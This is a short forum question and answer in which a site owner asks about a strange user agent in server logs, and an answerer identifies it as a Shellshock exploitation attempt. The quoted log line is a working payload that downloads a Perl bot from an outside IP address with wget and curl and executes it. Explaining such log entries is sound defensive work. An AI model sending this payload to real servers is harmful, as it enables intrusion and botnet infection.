# Getting very strange user agent in logs

Tags: user-agent

My logs shows a very strange user agent which is shown below:

```
() { :;}; /bin/bash -c "cd /var/tmp;wget http://151.236.44.210/efixx;curl -O http://151.236.44.210/efixx;perl efixx;perl /var/tmp/efixx;perl efixx"
```

Can anyone tell what is it trying to do... I think it is hacking attempt and how can restrict access to it.

Answer (score 0):

That does indeed look like an attempt to exploit the Shellshock bash bug. https://security.stackexchange.com/questions/68122/what-is-a-specific-example-of-how-the-shellshock-bash-bug-could-be-exploited

The sender of that request is trying to get your machine to download a purl script called efixx from http://151.236.44.210/ and then execute it. That purl script is the "LinuxNet perlbot".

You should check to make sure you don't have the file called "efixx" on your computer and if you do make sure it isn't running. Also make sure you are running the latest version of bash and you should be ok.